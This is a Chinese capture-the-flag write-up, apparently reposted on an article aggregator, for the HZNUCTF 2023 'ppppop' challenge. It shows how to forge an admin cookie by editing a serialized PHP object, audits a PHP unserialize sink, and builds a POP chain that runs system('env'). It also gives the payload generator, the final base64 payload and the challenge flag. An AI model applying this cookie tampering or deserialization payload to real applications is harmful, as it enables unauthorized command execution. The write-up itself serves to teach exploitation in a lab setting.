当前位置: 首页 > article >正文

[HZNUCTF 2023 preliminary]ppppop

article 2024/11/18 9:33:45

[HZNUCTF 2023 preliminary]ppppop

点进去之后是一片空白
接着我们打开HackBar 然后我们看到cookie里面有一个base64编码:

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MDt9

利用在线工具解码得到:
在这里插入图片描述

O:4:"User":1:{s:7:"isAdmin";b:0;}

由于序列化中的b代表着Boolean,所以我试着把0改为1。然后用在线工具加密得到:
在这里插入图片描述

Tzo0OiJVc2VyIjoxOntzOjc6ImlzQWRtaW4iO2I6MTt9

将新的编码加入到cookies 中,然后运行之后发现有回显,是一串php代码:

<?php
error_reporting(0);
include('utils.php');

class A {
    public $className;
    public $funcName;
    public $args;

    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    unserialize($payload);
}

接着我们对代码进行审计:

这段 PHP 代码定义了两个类 A 和 B,并包含了一些对用户输入进行处理的逻辑。整体来看,代码中可能存在安全风险,尤其是在处理用户输入的 payload 时进行反序列化操作。

以下是对代码的详细解读:

<?php
error_reporting(0);关闭 PHP 的错误报告。
include('utils.php');包含名为 utils.php 的文件。

class A {
    public $className;用于存储一个类名
    public $funcName;用于存储一个方法名
    public $args;用于存储传递给方法的参数。

    public function __destruct() {   这是 PHP 
    的析构函数,当对象被销毁时自动调用
        $class = new $this->className; 根据存储的
         className 创建一个新的对象 $class$funcName = $this->funcName;将存储的
         funcName 赋值给变量 $funcName$class->$funcName($this->args);
        调用新创建对象的指定方法,并传入存储的参数。
    }
}

class B {
    public function __call($func, $arg) {  这是
     PHP 的魔术方法,当调用一个不可访问的方法时自动触发。
        $func($arg[0]);
    }在这个方法中,它将第一个参数 $arg[0](即传入的参
    数数组中的第一个元素)作为参数传递给存储在变量 $func
     中的函数进行调用。
}

if(checkUser()) {
    highlight_file(__FILE__);
    $payload = strrev(base64_decode($_POST['payload']));
    从用户提交的 POST 请求中获取 payload 参数 ,对其进行
     base64 解码,然后将结果反转。
    unserialize($payload);对处理后的 payload 进行反序列化操作。
}

然后我们反序列化构造pop链,通过A类来触发B类中的__call从而实现任意命令,执行后的回显在class B的__call 魔术方法里,我们需要让func和arg成为我们需要的变量。所以我们构造pop链如下:

<?php
error_reporting(0);
include('utils.php');
 
class A {
    public $className="B";
    public $funcName="system";
    public $args="env";
 
    public function __destruct() {
        $class = new $this->className;
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }
}
 
class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}
 
$a=new A();
echo(base64_encode(strrev(serialize($a))));
?>

利用在线工具运行php代码得到:
在这里插入图片描述

然后我们构造payload:

payload=fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw

post 传参,运行得到flag:
在这里插入图片描述由此得到本题flag:
NSSCTF{34f387cb-4c56-4282-aeee-fce453a11d94}


http://www.kler.cn/a/287763.html

相关文章:

  • ASP.NET 部署到IIS,访问其它服务器的共享文件 密码设定
  • FFmpeg 4.3 音视频-多路H265监控录放C++开发十四,总结编码过程,从摄像头获得数据后,转成AVFrame,然后再次转成AVPacket,
  • 串口DMA接收不定长数据
  • 丹摩征文活动 |【前端开发】HTML+CSS+JavaScript前端三剑客的基础知识体系了解
  • 一文说清C++类型转换操作符(cast operator)
  • 智能化护士排班系统的设计与实现(文末附源码)
  • 万能的开题答辩稿,赶快收藏吧
  • golang并发编程——概述
  • RKNPU2从入门到实践 ---- 【9】使用RKNPU2的C API接口将RKNN模型部署在RK3588开发板上
  • 当敏捷开发遇上AI
  • Go发布自定义包
  • 华为云征文|遥遥领先的华为云Flexus云服务器X它来了~~~~
  • vrrp协议,主备路由器的选举
  • 关于VUE3开发频繁引入ref,reactive,computed等基础函数。
  • mac电脑里面的 磁盘分区,容器,宗卷,宗卷组的理解和使用
  • 【HarmonyOS NEXT开发】鸿蒙开发环境准备,ArkTS基础语法入门
  • 【JavaScript + ES6】前端八股文面试题
  • 笔记:如何使用Process Explorer分析句柄泄露溢出问题
  • 【高校科研前沿】三峡大学黄进副教授等人在环境科学Top期刊JCP发文:人类活动如何在气候变化下影响和降低生态敏感性:以中国长江经济带为例
  • react + ts + material-ui V5版本的table封装
  • css-50 Projects in 50 Days(2)
  • SAP2 - 系统管理课程 System Administration Course
  • redisson异步解锁
  • Tower for Mac Git客户端管理软件
  • 450. 删除二叉搜索树中的节点
  • 跟李沐学AI:序列模型